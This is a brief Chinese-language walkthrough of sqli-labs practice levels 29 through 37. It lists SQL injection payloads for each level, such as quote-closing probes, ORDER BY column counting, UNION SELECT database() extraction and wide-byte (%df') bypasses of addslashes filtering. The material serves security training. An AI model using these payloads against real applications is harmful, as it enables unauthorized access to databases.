Less-29
-
常规检查
payload: 1'--+ payload: 1' order by 3--+ payload: -1' union select 1,2,3--+ payload: -1' union select 1,database(),3--+
Less-30
-
常规检查
payload: 1"--+ payload: 1" order by 3--+ payload: -1" union select 1,2,3--+ payload: -1" union select 1,database(),3--+
Less-31
-
常规检查
payload: 1")--+ payload: 1") order by 3--+ payload: -1") union select 1,2,3--+ payload: -1") union select 1,database(),3--+
Less-32
使用preg_replace函数将 斜杠,单引号和双引号过滤了,尝试宽字节注入
-
宽字节注入
payload: -1%df' union select 1,database(),3 --+
Less-33
addslashes()函数
所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。
payload: -1%df' union select 1,database(),3 --+
Less-34
addslashes()函数
所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。
payload: uname=a%df' order by 2 #&passwd=a&submit=Submit
payload: uname=a%df' union select 1,database() #&passwd=a&submit=Submit
Less-35
此关使用addslashes()函数
,无符号闭合,后续爆表爆字段时可以使用宽字节注入
payload: 1 order by 3
payload: -1 union select 1,database(),3
Less-36
payload: -1%df' union select 1,2,database()--+
Less-37
payload: uname=a%df' order by 2 #&passwd=a&submit=Submit
payload: uname=a%df' union select 1,database() #&passwd=a&submit=Submit